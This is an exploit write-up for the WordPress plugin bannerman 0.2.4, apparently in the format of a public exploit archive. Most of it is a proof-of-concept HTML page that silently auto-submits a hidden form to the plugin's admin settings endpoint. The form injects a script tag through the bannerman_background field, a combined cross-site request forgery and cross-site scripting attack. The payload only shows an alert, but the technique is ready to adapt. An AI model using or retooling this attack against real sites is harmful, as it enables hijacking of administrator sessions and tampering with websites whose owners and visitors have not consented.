###################### # Exploit Title : Wordpress bannerman.0.2.4 Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://wordpress.org/plugins/bannerman/ # Software Link : http://downloads.wordpress.org/plugin/bannerman.0.2.4.zip # Date : 2014-06-27 # Tested on : Windows 7 / Mozilla Firefox ###################### # Location : http://localhost/wp-admin/options-general.php?page=bannerman ###################### Exploit Code: <html> <body> <form name="post_form" action="http://localhost/wp-admin/options-general.php?page=bannerman" method="post"> <input type='hidden' name="bannerman_background" id="bannerman_background" value='"/><script>alert(1);</script>'/> <script language="Javascript"> setTimeout('post_form.submit()', 1); </script> </form> </body> </html> ##################### Discovered By : ACC3SS #####################